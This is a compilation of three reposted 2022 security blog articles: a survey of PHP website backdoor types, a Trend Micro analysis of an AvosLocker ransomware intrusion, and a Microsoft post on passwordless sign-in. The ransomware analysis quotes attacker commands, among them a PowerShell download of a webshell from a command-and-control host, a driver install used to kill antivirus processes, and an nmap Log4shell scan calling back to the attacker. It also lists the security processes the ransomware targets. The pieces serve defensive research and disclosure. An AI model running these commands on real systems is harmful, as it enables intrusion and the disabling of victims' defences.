Here’s another example of a quite well hidden RCE backdoor in a Magento environment:

A well-hidden RCE backdoor in a Magento environment

Attackers make heavy use of the eval function which executes the command in the victim environment.

FILE_PUT_CONTENTS

These backdoors utilise the PHP function file_put_contents which will write the instructed content to a file on the victim environment.

Here is an example of such a backdoor lodged in a WordPress configuration file wp-config.php:

This backdoor writes the specified malicious content into the file structure of the victim website given the correct parameters in the attacker’s request, allowing them to infect other files on the server with the content of their choice.

cURL

The curl() function facilitates the transmission of data. It can be used maliciously to download remote code which can be executed or directly displayed. This way, malware authors are able to create a small backdoor that only has this curl functionality implemented while the payload itself can be downloaded from a remote source.

It has many uses, and as such can be misused in many ways by attackers. We have seen it used frequently in credit card skimmers to transmit sensitive details to exfiltration destinations. It can also be used in RCE backdoors:

Since the attackers have crafted a backdoor to (mis)use curl, and they control the parameters under which it will function, in this way they are able to send or receive malicious traffic to and from the website, depending on how the backdoor is designed.

Authentication Bypass

These types of backdoors are most often seen in WordPress environments. They are small PHP scripts which allow the attacker to automatically log in to the administrator panel without needing to provide any password.

As long as they include the database configuration file in the script then they are able to set the necessary cookies for authorization, as seen in this example here:

A backdoor which bypasses normal authentication

The existence of such backdoors presents a case that additional authentication requirements should be employed within website environments. Protecting your admin panel with our firewall’s protected page feature is a great way to do this.

If you’re not a user of our firewall there are a lot of other ways that your admin panel can be protected.

Basic RCE via POST

Backdoors that take input through POST requests are quite common and many of the backdoor types that we’ve seen contain such functionality. Some of them, however, are quite small and rely exclusively on POST requests.

The example below shows one such backdoor, coupled with basic password protection to ensure that the backdoor is not used by anybody that does not have access to the password.

A basic remote code execution backdoor which uses POST

Fake Plugins

Another tactic that we’ve seen attackers use is the use of fake plugins. This is frequently used as a payload to deliver spam and malware, since WordPress will load the components present in the ./wp-content/plugins directory.

We’ve also seen attackers use these plugins as backdoors to maintain access to compromised environments.

A fake plugin in a WordPress environment

Since admin panel compromises are a very common attack vector, the usage of fake/malicious backdoor plugins is quite popular with attackers.

System Shell Backdoors

Attackers have also written malware that interacts with the hosting environment itself and will attempt to run shell commands via PHP scripts in the environment. This is not always possible, depending on the security settings of the environment, but here’s an example of one such backdoor:

If system() is disabled in the environment then these will not work, so the functionality of such backdoors will be limited by the security settings in the host.

COOKIE Based Backdoors

Some malware creators use COOKIES as a storage for various data. These can be decryption keys used to decode an otherwise inaccessible payload, or even the entire malicious payload itself.

CREATE_FUNCTION

The create_function() is often used by malware instead of (or in conjunction with) the eval() function to hide the execution of the malicious code. The payload is encapsulated inside the crafted custom function, often with an obfuscated name to make the functionality less clear.

This function is then called somewhere else within the code, and thus the payload is evaluated. Backdoors have been found to abuse this to place their payload back on the infected website after it was removed.

A backdoor which creates a malicious function in the victim environment

RCE via GET

Backdoors have also been seen using GET requests for input, rather than POST requests. In the example below we can see that the backdoor will execute the malicious payload if a GET request contains a certain string.

A remote code execution backdoor which uses GET

This allows the attackers to restrict the usage of the backdoor to only those who know the exact parameters to specify in the malicious GET request to the website. If the correct parameters are given then the backdoor will execute its intended function.

Database Management Backdoors

Most often attackers will misuse tools such as Adminer to insert malicious content into the victim website’s database, but occasionally we have seen them craft their own database management tools. This allows them to insert admin users into the website as well as inject malicious JavaScript into the website content to redirect users to spam or scam websites or steal credit card information from eCommerce environments.

Conclusion & Mitigation Steps

Backdoors play a crucial role for the attackers in a huge number of website compromises. Once the attackers are able to gain a foothold into an environment their goal is to escalate the level of access they have as much as possible. Certain vulnerabilities will provide them access only to certain directories. For example, a subdirectory of the wp-content/uploads area of the file structure.

Often the first thing they will do is place a malicious uploader or webshell into the environment, giving them full control over the rest of the website files. Once that is established they are able to deliver a payload of their choosing.

If default configurations are in place in a standard WordPress/cPanel/WHM configuration a single compromised admin user on a single website can cause the entire environment to be infected. Attackers can move laterally throughout the environment by the use of symlinks even if the file permissions/ownership are configured correctly.

Malicious actors are writing new code daily to try to evade existing security detections. As security analysts and researchers it’s our job to stay on top of the most recent threats and ensure that our tools and monitoring detect it all.

Throughout the year 2021 we added hundreds of new signatures for newly discovered backdoors. I expect we’ll also be adding hundreds more this year.

If you’d like us to help you monitor and secure your website from backdoors and other threats you can sign up for our platform-agnostic website security services.

Source :
https://blog.sucuri.net/2022/05/examining-emerging-backdoors.html

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable anti-virus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.

Infection chain

fig1-avoslocker-ransomware-disables-av-scans-log4shell — Figure 1. AvosLocker infection chain

According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:

fig2-avoslocker-ransomware-disables-av-scans-log4shell — Figure 2. The ADSS exploit abusing CVE-2021-40539

Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used. However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.

Mapping the infection

The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server. Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process.

fig3-avoslocker-ransomware-disables-av-scans-log4shell — Figure 3. Remotely executing an HTA file from the C&C server. Screenshots taken from Trend Micro Vison One.

fig4-avoslocker-ransomware-disables-av-scans-log4shell — Figure 4. HTA file connecting to the C&C

A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.

fig5-avoslocker-ransomware-disables-av-scans-log4shell — Figure 5. Obfuscated PowerShell script contains a shellcode

The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >. According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.

fig6-avoslocker-ransomware-disables-av-scans-log4shell — Figure 6. Gather system information

The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.

fig7-avoslocker-ransomware-disables-av-scans-log4shell — Figure 7. Executed with the /domain argument to collect username information

fig8-avoslocker-ransomware-disables-av-scans-log4shell — Figure 8. query user information for session data

The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.

fig9-avoslocker-ransomware-disables-av-scans-log4shell — Figure 9. The PowerShell downloading and installing AnyDeskMSI

We observed that a new user account was created, added to the current domain, and included in the administrator group. This ensures the attacker can have administrative rights to the infected system. The attackers also checked the running processes in the system via TaskList to check for anti-virus processes running in the infiltrated system.

fig10-avoslocker-ransomware-disables-av-scans-log4shell — Figure 10. Creating a new account with admin rights

fig11-avoslocker-ransomware-disables-av-scans-log4shell — Figure 11. Checking for anti-virus processes running

During the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.

fig12-avoslocker-ransomware-disables-av-scans-log4shell — Figure 12. Terminating security products running

Tools and functions

Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products. The tools transferred using AnyDesk are:

Netscan: To scan for other endpoints
Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints
Hacking tools Mimikatz and Impacket: For lateral movement
PDQ deploy: For mass deployment of malicious script to multiple endpoints
Aswarpot.sys: For disabling defense solutions. We noted that it can disable a number of anti-virus products, previously identified by Aon’s researchers.

fig13-avoslocker-ransomware-disables-av-scans-log4shell — Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk

We found an Avast anti-rootkit driver installed as service ‘asWarPot.sys’ using the command sc.exe create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running anti-virus product. We noted the unusual use of cmd.exe for execution of the file.

fig14-avoslocker-ransomware-disables-av-scans-log4shell — Figure 14. Executing the anti-rootkit driver in the system

Mimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were detected and deleted.

fig15-avoslocker-ransomware-disables-av-scans-log4shell — Figure 15. Detecting and deleting Mimikatz

We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.

fig16-avoslocker-ransomware-disables-av-scans-log4shell — Figure 16. Listing and terminating the security products found running in the compromised system

Verification: Manual replication of anti-virus disabling routine

We manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure 17 shows the list of processes that the routine searches on infection :

EndpointBasecamp.exe
Trend Micro Endpoint Basecamp
ResponseService.exe
PccNTMon.exe
SupportConnector.exe
AOTAgent.exe
CETASvc.exe
CETASvc
iVPAgent.exe
tmwscsvc.exe
TMResponse
AOTAgentSvc
TMBMServer
iVPAgent
Trend Micro Web Service Communicator
Tmccsf
Tmlisten
Ntrtscan
TmWSCSvc

fig17-avoslocker-ransomware-disables-av-scans-log4shell — Figure 17. Searching for processes

We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.

fig18-avoslocker-ransomware-disables-av-scans-log4shell — Figure 18. Driver file preparing to disable an anti-virus product

The DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.

fig19-avoslocker-ransomware-disables-av-scans-log4shell — Figure 19. DeviceIoControl as an argument with the current process ID

Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.

fig20-avoslocker-ransomware-disables-av-scans-log4shell — Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).

Other executions and lateral movement

After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.

fig21-avoslocker-ransomware-disables-av-scans-log4shell — Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)

We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.

fig22-avoslocker-ransomware-disables-av-scans-log4shell — Figure 22. XenArmor password recovery tool execution

We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network. They used the command nmap –script log4shell.nse –script-args log4shell.waf-bypass=true –script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server.

fig23-avoslocker-ransomware-disables-av-scans-log4shell — Figure 23. Checking for log4shell

We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.

fig24-avoslocker-ransomware-disables-av-scans-log4shell — Figure 24. Running more system network configuration discovery scans

Deploying across the network

We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.

fig25-avoslocker-ransomware-disables-av-scans-log4shell — Figure 25. Deploying malicious batch scripts to other endpoints

The deployed batch script has the following commands:

Disable Windows Update and Microsoft Defender

fig26-avoslocker-ransomware-disables-av-scans-log4shell — Figure 26. Disable Microsoft defense services

Prevents safeboot execution of security products

fig27-avoslocker-ransomware-disables-av-scans-log4shell — Figure 27. Prevent security products’ execution

Create new administrator account

fig28-avoslocker-ransomware-disables-av-scans-log4shell — Figure 28. Create new account

Add the AutoStart mechanism for the AvosLocker executable (update.exe)

fig29-avoslocker-ransomware-disables-av-scans-log4shell — Figure 29. Add Autostart for ransomware executable

Disables legal notice caption

fig30-avoslocker-ransomware-disables-av-scans-log4shell — Figure 30. Disable legal notice

Set safeboot with networking and disables Windows Error Recovery and reboot

fig31-avoslocker-ransomware-disables-av-scans-log4shell — Figure 31. Setting and disabling network and specific Windows functions

Conclusion

While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).

This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice. Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.

Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.

However, and specific to this instance, the attempt to kill an anti-virus product such as this variant’s TaskKill can also be foiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.

Avast responded to our notification with this statement:

“We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory.

The below example shows that the blocking works (output from the “sc start” command):

(SC) StartService FAILED 1275:

This driver has been blocked from loading

The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.

All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.

For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.”

Indicators of Compromise (IOCs)

File	SHA256	Detection
Malicious batch file component	a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15	Trojan.BAT.KILLAV.YACAA
AvosLocker executable	05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5	Ransom.Win32.AVOSLOCKER.SMYXBLNT
Mimikatz executable (x32 and x64)	912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9	HackTool.Win64.MIMIKATZ.ZTJA
e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98	HackTool.Win32.Mimikatz.CNFW
Log4shell Nmap NSE script	ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96	Backdoor.Win32.CVE202144228.YACAH
Impacket tool	14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8	HackTool.Win32.Impacket.AA

Source :
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

This World Password Day consider ditching passwords altogether

Did you know that May 5, 2022, is World Password Day?¹ Created by cybersecurity professionals in 2013 and designated as the first Thursday every May, World Password Day is meant to foster good password habits that help keep our online lives secure. It might seem strange to have a day set aside to honor something almost no one wants to deal with—like having a holiday for filing your income taxes (actually, that might be a good idea). But in today’s world of online work, school, shopping, healthcare, and almost everything else, keeping our accounts secure is more important than ever. Passwords are not only hard to remember and keep track of, but they’re also one of the most common entry points for attackers. In fact, there are 921 password attacks every second—nearly doubling in frequency over the past 12 months.²

But what if you didn’t have to deal with passwords at all? Last fall, we announced that anyone can completely remove the password from their Microsoft account. If you’re like me and happy to ditch passwords completely, read on to learn how Microsoft is making it possible to start enjoying a passwordless life today. Still, we know not everyone is ready to say goodbye to passwords, and it’s not possible for all your online accounts. We’ll also go over some easy ways to improve your password hygiene, as well as share some exciting news from our collaboration with the FIDO Alliance about a new way to sign in without a password.

Free yourself with passwordless sign-in

Yes, you can now enjoy secure access to your Microsoft account without a password. By using the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email, you can go passwordless with any of your Microsoft apps and services. Just follow these five steps:

Download and install Microsoft Authenticator (linked to your personal Microsoft account).
Sign in to your Microsoft account.
Choose Security. Under Advanced security options, you’ll see Passwordless account in the section titled Additional security.
Select Turn on.
Approve the notification from Authenticator.

User interface of Microsoft Authenticator app providing instructions on how to turn on passwordless account option.

Notification from Microsoft Authenticator app confirming user's password has been removed.

Once you approve the notification, you’ll no longer need a password to access your Microsoft accounts. If you decide you prefer using a password, you can always go back and turn off the passwordless feature. Here at Microsoft, nearly 100 percent of our employees use passwordless options to log into their corporate accounts.

Strengthen security with multifactor authentication

One simple step we can all take to protect our accounts today is adding multifactor authentication, which blocks 99.9 percent of account compromise attacks. The Microsoft Authenticator app is free and provides multiple options for authentication, including time-based one-time passcodes (TOTP), push notifications, and passwordless sign-in—all of which work for any site that supports multifactor authentication. Authenticator is available for Android and iOS and gives you the option to turn two-step verification on or off. For your Microsoft Account, multifactor authentication is usually only needed the first time you sign in or after changing your password. Once your device is recognized, you’ll just need your primary sign-in.

Microsoft Authenticator screen showing different accounts, including: Microsoft, Contoso Corporation, and Facebook.

Make sure your password isn’t the weak link

Rather than keeping attackers out, weak passwords often provide a way in. Using and reusing simple passwords across different accounts might make our online life easier, but it also leaves the door open. Attackers regularly scroll social media accounts looking for birthdates, vacation spots, pet names and other personal information they know people use to create easy-to-remember passwords. A recent study found that 68 percent of people use the same password for different accounts.³ For example, once a password and email combination has been compromised, it’s often sold on the dark web for use in additional attacks. As my friend Bret Arsenault, our Chief Information Security Officer (CISO) here at Microsoft, likes to say, “Hackers don’t break in, they log in.”

Some basics to remember—make sure your password is:

At least 12 characters long.
A combination of uppercase and lowercase letters, numbers, and symbols.
Not a word that can be found in a dictionary, or the name of a person, product, or organization.
Completely different from your previous passwords.
Changed immediately if you suspect it may have been compromised.

Tip: Consider using a password manager. Microsoft Edge and Microsoft Authenticator can create (and remember) strong passwords using Password Generator, and then automatically fill them in when accessing your accounts. Also, keep these other tips in mind:

Only share personal information in real-time—in person or by phone. (Be careful on social media.)
Be skeptical of messages with links, especially those asking for personal information.
Be on guard against messages with attached files, even from people or organizations you trust.
Enable the lock feature on all your mobile devices (fingerprint, PIN, or facial recognition).
Ensure all the apps on your device are legitimate (only from your device’s official app store).
Keep your browser updated, browse in incognito mode, and enable Pop-Up Blocker.
Use Windows 11 and turn on Tamper Protection to protect your security settings.

Tip: When answering security questions, provide an unrelated answer. For example, Q: “Where were you born?” A: “Green.” This helps throw off attackers who might use information skimmed from your social media accounts to hack your passwords. (Just be sure the unrelated answers are something you’ll remember.)

Passwordless authentication is becoming commonplace

As part of a historic collaboration, the FIDO Alliance, Microsoft, Apple, and Google have announced plans to expand support for a common passwordless sign-in standard. Commonly referred to as passkeys, these multi-device FIDO credentials offer users a platform-native way to safely and quickly sign in to any of their devices without a password. Virtually unable to be phished and available across all your devices, a passkey lets you sign in simply by authenticating with your face, fingerprint, or device PIN.

In addition to a consistent user experience and enhanced security, these new credentials offer two other compelling benefits:

Users can automatically access their passkeys on many of their devices without having to re-enroll for each account. Simply authenticate with your platform on your new device and your passkeys will be there ready to use—protecting you against device loss and simplifying device upgrade scenarios.
With passkeys on your mobile device, you’re able to sign in to an app or service on nearly any device, regardless of the platform or browser the device is running. For example, users can sign in on a Google Chrome browser that’s running on Microsoft Windows, using a passkey on an Apple device.

These new capabilities are expected to become available across Microsoft, Apple, and Google platforms starting in the next year. This type of Web Authentication (WebAuthn) credential represents a new era of authentication, and we’re thrilled to join the FIDO Alliance and others in the industry in supporting a common standard for a safe, consistent authentication experience. Learn more about this open-standards collaboration and exciting passwordless capabilities coming for Microsoft Azure Active Directory in a blog post from Alex Simons, Vice President, Identity Program Management.

Helping you stay secure year-round

Read more about Microsoft’s journey to provide passwordless authentication in a blog post by Joy Chik, Corporate Vice President of Identity. You can also read the complete guide to setting up your passwordless account with Microsoft, including FAQs and download links. And be sure to visit Security Insider for interviews with cybersecurity thought leaders, news on the latest cyberthreats, and lots more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Source :
https://www.microsoft.com/security/blog/2022/05/05/this-world-password-day-consider-ditching-passwords-altogether/